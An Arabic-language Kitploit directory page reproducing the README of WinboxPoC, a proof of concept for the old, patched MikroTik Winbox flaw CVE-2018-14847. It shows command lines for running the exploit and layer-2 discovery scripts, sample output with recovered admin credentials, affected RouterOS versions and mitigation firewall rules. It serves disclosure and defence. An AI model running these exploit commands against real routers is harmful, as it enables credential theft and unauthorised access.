Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
WinboxPoC — إثبات المبدأ لثغرة Winbox الحرجة (CVE-2018-14847) | Kitploit
أدوات/GitHubGitHub/basucert/winboxpoc
هجمات كلمات المرورتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الشبكاتاختبار الاختراقArchived
GitHubbasucert/winboxpoc

WinboxPoC

إثبات المبدأ لثغرة Winbox الحرجة (CVE-2018-14847)

عرض المستودع
520461منذ 5 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
الموقع الإلكتروني

WinboxExploit

هذا هو دليل إثبات المفهوم للثغرة الحرجة في WinBox (CVE-2018-14847) والتي تسمح بقراءة الملفات التعسفية لكلمات المرور النصية العادية.

لقد تم إصلاح الثغرة منذ فترة طويلة، لذلك انتهى هذا المشروع ولن يتم دعمه أو تحديثه بعد الآن. يمكنك عمل fork له وتحديثه بنفسك بدلاً من ذلك.

منشور المدونة

https://n0p.me/winbox-bug-dissection/

المتطلبات

  • Python 3+

هذا السكريبت لن يعمل مع Python 2.x أو إصدارات أقل.

كيفية الاستخدام

السكريبت بسيط ويستخدم مع وسائط بسيطة في سطر الأوامر.

WinBox (TCP/IP)

استغلال الثغرة وقراءة كلمة المرور.

root@kitploit:~
python3 WinboxExploit.py <IP-ADDRESS> [PORT]

مثال:

root@kitploit:~
$ python3 WinboxExploit.py 172.17.17.17
Connected to 172.17.17.17:8291
Exploit successful
User: admin
Pass: Th3P4ssWord

MAC server WinBox (Layer 2)

يمكنك استخراج الملفات حتى إذا لم يكن للجهاز عنوان IP.

فحص اكتشاف بسيط لأجهزة Mikrotik المتصلة محليًا.

root@kitploit:~
python3 MACServerDiscover.py

مثال:

root@kitploit:~
$ python3 MACServerDiscover.py
Looking for Mikrotik devices (MAC servers)

    aa:bb:cc:dd:ee:ff 

    aa:bb:cc:dd:ee:aa

استغلال الثغرة وقراءة كلمة المرور.

root@kitploit:~
python3 MACServerExploit.py <MAC-ADDRESS>

مثال:

root@kitploit:~
$ python3 MACServerExploit.py aa:bb:cc:dd:ee:ff

User: admin
Pass: Th3P4ssWord

الإصدارات الضعيفة

جميع إصدارات RouterOS من 2015-05-28 إلى 2018-04-20 معرضة لهذا الاستغلال.

أجهزة Mikrotik التي تعمل بإصدارات RouterOS:

  • Longterm: 6.30.1 - 6.40.7
  • Stable: 6.29 - 6.42
  • Beta: 6.29rc1 - 6.43rc3

لمزيد من المعلومات انظر: https://blog.mikrotik.com/security/winbox-vulnerability.html

تقنيات التخفيف

  • ترقية جهاز التوجيه إلى إصدار RouterOS يتضمن الإصلاح.
  • تعطيل خدمة WinBox على جهاز التوجيه.
  • يمكنك تقييد الوصول إلى خدمة WinBox لعناوين IP محددة باستخدام ما يلي:
root@kitploit:~
/ip service set winbox address=10.0.0.0/8,172.16.0.0/12,192.168.0.0/16
  • يمكنك استخدام بعض قواعد التصفية (ACL) لمنع الوصول الخارجي إلى خدمة WinBox:
root@kitploit:~
/ip firewall filter add chain=input in-interface=wan protocol=tcp dst-port=8291 action=drop
  • يمكن تحديد الوصول إلى خدمة mac-winbox عن طريق تحديد الواجهات المسموح بها:
root@kitploit:~
/tool mac-server mac-winbox

حقوق النشر

  • برعاية CERTCC الإيراني (https://certcc.ir). جميع الحقوق محفوظة.
تنزيل الأداة